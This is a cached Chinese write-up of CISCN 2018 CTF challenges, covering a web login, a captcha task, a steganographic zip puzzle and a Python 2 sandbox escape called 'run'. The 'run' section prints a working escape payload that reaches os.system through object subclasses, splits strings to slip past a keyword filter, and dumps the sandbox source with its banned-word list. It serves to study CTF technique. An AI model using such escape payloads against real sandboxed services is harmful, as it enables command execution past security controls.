原文链接 http://findneo.tech/20180430ciscn/
注:以下为加速网络访问所做的原文缓存,经过重新格式化,可能存在格式方面的问题,或偶有遗漏信息,请以原文为准。
WEB
easyweb
http://114.116.26.217/
学习了一波json web token ,但是没想到是个脑洞。
账户admin,空密码登陆。
ciscn{2a36b5f78a1d6a107212d82ee133c421}
MISC
验证码
本题目为验证码破解,选手需在指定时间完成对验证码的破解,成功后获取Flag。请使用队伍token进行登陆。 参考数据:https://share.weiyun.com/6e055fc3402e86c7cbb5384f1a6b41b8
https://game.captcha.qq.com/hslj/html/hslj/
题目有点问题,手动玩了一会儿。
ciscn{12qiftb1qj12mbzm1xmjd2iix2ibqz7i}
后来换成输验证码得flag了。
picture
请从图中找出密码。
binwalk -e 分离得到 97E4 和 97E4.zlib 两个文件,后者是前者的 zlib 压缩文件。
import zlib
print zlib.decompress(open('97E4.zlib','rb').read())==open('97E4','rb').read()
# got True
文件97E4 内容的base64解码后稍做处理是一个加密的压缩包。
import base64
t=open('97E4','rb').read()
m=base64.b64decode(t).encode("hex")
n=''
for i in range(len(m)/4):
n+=m[i*4+2:i*4+4]+m[i*4:i*4+2]
print n
# 504b040300140001000030904c97542e7f25005a0000004e0000000400006f6365647ab0d6a3f3bbc8060511ce0c8b62793d8d39caf2b644325509c991cb202dc981e60ea354ca8de79f3bc187f6719f4738adf24fa3ca2d9d7b8adda175d833d1c0264225c62d86784977cf5973989ea77ddbbf31060aef47124fca4b500201003f00140001000030904c97542e7f25005a0000004e00000004002400000000000000200000000000006f636564000a002000000000000100189800e452da8501d3bcf6ace5da8701d3bcf6ace5da8701d34b500605000000000001000100560000007c000000dc505b74796f68206e2e325d370a0d3e3e203e7da87da87da80a0d0a0d7254636162656361206b6d28736f207465726563746e63206c61206c616c74733a290a0d20206946656c2220703c737965686c6c3023223e202c696c656e3120202c6e693c206f6d7564656c0d3e200a2020a820a87da87d0d7d5a0a7265446f766973696f69456e7272726f203a7da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da83c20202d617073736f7764723b200d293e0a3e3e0020
大致内容如下:
对比得到密码: integer division or modulo by zero
得到一串编码后字符:
解码得到 CISCN{C16E6F6E065DA0306E318D095C68BDC0}
run
参考链接:
- http://cauc.me/2017/11/16/python%E6%B2%99%E7%9B%92%E7%BB%95%E8%BF%87/
- https://blog.csdn.net/qq_35078631/article/details/78504415
payload:
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
# ciscn{db87226edc7f9aff82a6b524053eef9e}
顺便dump下来几个文件
cpython.py
from ctypes import pythonapi,POINTER,py_object
_get_dict = pythonapi._PyObject_GetDictPtr
_get_dict.restype = POINTER(py_object)
_get_dict.argtypes = [py_object]
del pythonapi,POINTER,py_object
def get_dict(ob):
return _get_dict(ob).contents.value
sandbox.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-04-09 23:30:58
# @Author : Xu (you@example.org)
# @Link : https://xuccc.github.io/
# @Version : $Id$
from sys import modules
from cpython import get_dict
from types import FunctionType
main = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__
def delete_type():
type_dict = get_dict(type)
del type_dict['__bases__']
del type_dict['__subclasses__']
def delete_func_code():
func_dict = get_dict(FunctionType)
del func_dict['func_code']
def safe_import(__import__,whiteList):
def importer(name,globals={},locals={},fromlist=[],level=-1):
if name in whiteList:
return __import__(name,globals,locals,fromlist,level)
else:
print "HAHA,[%s] has been banned~" % name
return importer
class ReadOnly(dict):
"""docstring for ReadOnlu"""
def __delitem__(self,keys):
raise ValueError(":(")
def pop(self,key,default=None):
raise ValueError(":(")
def popitem(self):
raise ValueError(":(")
def setdefault(self,key,value):
raise ValueError(":(")
def __setitem__(self,key,value):
raise ValueError(":(")
def __setattr__(self, name, value):
raise ValueError(":(")
def update(self,dict,**kwargs):
raise ValueError(":(")
def builtins_clear():
whiteList = "raw_input SyntaxError ValueError NameError Exception __import__".split(" ")
for mod in __builtins__.__dict__.keys():
if mod not in whiteList:
del __builtins__.__dict__[mod]
def input_filter(string):
ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
for i in ban:
if i in string.lower():
print "{} has been banned!".format(i)
return ""
return string
# delete_type();
del delete_type
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear
whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins
del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__
print """
____
| _ \ _ _ _ __
| |_) | | | | '_ \
| _ <| |_| | | | |
|_| \_\\__,_|_| |_|
Escape from the dark house built with python :)
Try to getshell then find the flag!
"""
while 1:
inp = raw_input('>>>')
cmd = input_filter(inp)
try:
exec cmd
except NameError, e:
print "wow something lose!We can\'t find it ! D:"
except SyntaxError,e:
print "Noob! Synax Wrong! :("
except Exception,e:
print "unknow error,try again :>"
/home/ctf/bin
